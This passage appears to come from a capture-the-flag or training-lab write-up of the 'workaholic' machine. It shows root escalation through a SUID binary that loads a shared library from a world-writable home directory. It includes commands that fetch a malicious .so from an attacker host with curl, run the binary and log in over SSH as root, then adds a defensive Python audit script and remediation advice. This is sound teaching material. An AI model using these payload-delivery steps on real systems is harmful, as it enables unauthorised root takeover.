Shared Object Injection


It has been identified that the SUID binary /var/www/html/wordpress/blog/wp-monitor loads a shared object from the home directory of the ted user, and that directory is writable by anyone. Because the loader resolves the library from a path any local user controls, code execution in the context of the binary's owner is achievable by placing a malicious shared object (.so) at the expected path.

charlie@workaholic:~$ mkdir -p /home/ted/.lib

Creating the .lib directory in the home directory of the ted user.

charlie@workaholic:~$ curl -s http://192.168.45.182/libsecurity.so -o /home/ted/.lib/libsecurity.so ; chmod 777 /home/ted/.lib/libsecurity.so

Delivering the payload.

charlie@workaholic:~$ /var/www/html/wordpress/blog/wp-monitor 2>&1
[+] Checking the logs...

Executing the SUID binary.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ ssh root@$IP -i ~/.ssh/id_ed25519
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-48-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
 
 System information as of Fri Jun 27 05:48:14 PM UTC 2025
 
  System load:  0.4               Processes:               175
  Usage of /:   55.3% of 9.75GB   Users logged in:         1
  Memory usage: 45%               IPv4 address for ens192: 192.168.136.229
  Swap usage:   0%
 
 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.
 
   https://ubuntu.com/engage/secure-kubernetes-at-the-edge
 
Expanded Security Maintenance for Applications is not enabled.
 
17 updates can be applied immediately.
10 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
 
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
Last login: Fri Apr 11 14:01:38 2025 from 192.168.118.6
root@workaholic:~# whoami
root
root@workaholic:~# hostname
workaholic
root@workaholic:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:b2:d9 brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.136.229/24 brd 192.168.136.255 scope global ens192
       valid_lft forever preferred_lft forever

System-level compromise: root access obtained via SSH.
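The root cause above is a privileged binary whose dynamic loader resolves a dependency from a directory a local user can write to. The following is an added audit script, not code from this engagement or from wp-monitor: it parses ldd-style output and the binary's RPATH/RUNPATH entries and flags any dependency (resolved or unresolved) whose path runs through a world-writable or non-root-owned component. The ldd output, the RUNPATH value and the temporary directory layout in demo() are constructed to mirror the finding (a missing libsecurity.so searched for under a world-writable home directory); on a real host you would feed it the output of `ldd` and `readelf -d` for each binary returned by `find / -perm -4000`.

```python
"""Audit a set-uid binary's shared-library dependencies for paths a local user
could write to. Added example: this is not wp-monitor's code; the ldd output,
RUNPATH and directory layout in demo() are constructed to mirror the finding
above (a dependency resolved from a world-writable home directory)."""
import os
import stat
import tempfile


def parse_ldd(output):
    """Map each soname in ldd(1)-style output to its resolved path (None if 'not found').
    Lines without '=>' (vdso, the dynamic loader itself) carry no path and are skipped."""
    deps = {}
    for line in output.splitlines():
        if "=>" not in line:
            continue
        left, _, right = line.partition("=>")
        right = right.strip()
        deps[left.strip()] = None if right.startswith("not found") else right.split()[0]
    return deps


def untrusted_components(path, trusted_uids=(0,)):
    """Walk from the filesystem root down to `path` and report every component that
    is world-writable or owned by an untrusted uid (trusted_uids=None disables the
    owner check). A sticky (+t) directory only protects the entries inside it from
    rename/unlink by other users, so the sticky exemption applies to ancestors only,
    never to the final component: anyone can still create a new file in /tmp."""
    findings = []
    comps = []
    p = os.path.abspath(path)
    while True:
        comps.append(p)
        parent = os.path.dirname(p)
        if parent == p:
            break
        p = parent
    comps.reverse()  # root first
    for comp in comps:
        try:
            st = os.lstat(comp)
        except FileNotFoundError:
            continue  # does not exist yet; its parent decides who may create it
        mode = st.st_mode
        is_ancestor = comp != comps[-1]
        sticky_dir = stat.S_ISDIR(mode) and bool(mode & stat.S_ISVTX)
        if mode & stat.S_IWOTH and not (is_ancestor and sticky_dir):
            findings.append((comp, "world-writable"))
        elif trusted_uids is not None and st.st_uid not in trusted_uids:
            findings.append((comp, "owned by uid %d" % st.st_uid))
    return findings


def audit(deps, search_dirs, trusted_uids=(0,)):
    """deps: result of parse_ldd; search_dirs: RPATH/RUNPATH entries (readelf -d).
    Returns (soname, offending path, reason) triples."""
    findings = []
    for soname, path in deps.items():
        if path is None:
            # Unresolved library: whoever can write to a search directory can supply it.
            for d in search_dirs:
                for comp, why in untrusted_components(d, trusted_uids):
                    findings.append((soname, comp, "unresolved; search dir " + why))
        else:
            for comp, why in untrusted_components(path, trusted_uids):
                findings.append((soname, comp, why))
    return findings


def demo():
    """Build a constructed layout mirroring the finding and audit it. The owner
    check is disabled because the temporary tree belongs to the current user."""
    with tempfile.TemporaryDirectory() as root:
        libdir = os.path.join(root, "usr", "lib")
        home = os.path.join(root, "home", "ted")
        os.makedirs(libdir)
        os.makedirs(home)
        os.chmod(home, 0o777)  # the world-writable home directory from the finding
        with open(os.path.join(libdir, "libc.so.6"), "w"):
            pass  # stand-in for a properly root-owned system library
        sample_ldd = (  # constructed ldd output for a binary like wp-monitor
            "\tlinux-vdso.so.1 (0x00007ffd1c5f2000)\n"
            "\tlibsecurity.so => not found\n"
            "\tlibc.so.6 => %s (0x00007f2a3e000000)\n"
        ) % os.path.join(libdir, "libc.so.6")
        runpath = [os.path.join(home, ".lib")]  # constructed RUNPATH entry
        return audit(parse_ldd(sample_ldd), runpath, trusted_uids=None)


if __name__ == "__main__":
    for soname, where, why in demo():
        print("[!] %s: %s (%s)" % (soname, where, why))
```

The unresolved-library case is the one that matters here: ldd reports `libsecurity.so => not found`, which on its own looks harmless, but combined with a search directory under a world-writable home it means any local user can create the file the loader will pick up. The fix on the host side is to build the binary without a user-controlled RPATH/RUNPATH (or ship the library under a root-owned directory such as /usr/lib) and to remove world-write permission from /home/ted.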